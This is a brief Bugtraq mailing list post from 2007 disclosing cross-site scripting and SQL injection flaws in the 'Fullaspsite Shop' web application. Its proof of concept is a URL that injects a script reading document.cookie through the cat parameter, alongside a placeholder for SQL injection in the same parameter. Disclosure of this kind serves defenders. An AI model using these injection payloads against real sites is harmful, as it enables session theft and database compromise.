Bugtraq mailing list archives

Fullaspsite Shop (tr) Xss & SqL İnj. VulnZ.


From: ShaFuq31 () HoTMaiL CoM
Date: 13 Feb 2007 19:50:13 -0000

Fullaspsite Shop (tr) Xss & SqL İnj. VulnZ.

Found By : ShaFuck31

Risk : Medium

VulnZ : Xss & SqL Injection

Vuln. :

http://victim.com/ScriptPath/listmain.asp?cat=<script>alert(document.cookie);</script>

http://victim.com/ScriptPath/listmain.asp?cat=[ SqL Code ]

GreetZ : BLaSTER , DesquneR , The RéD , Dekolax .. AnD aLL of my friendZ...


Current thread: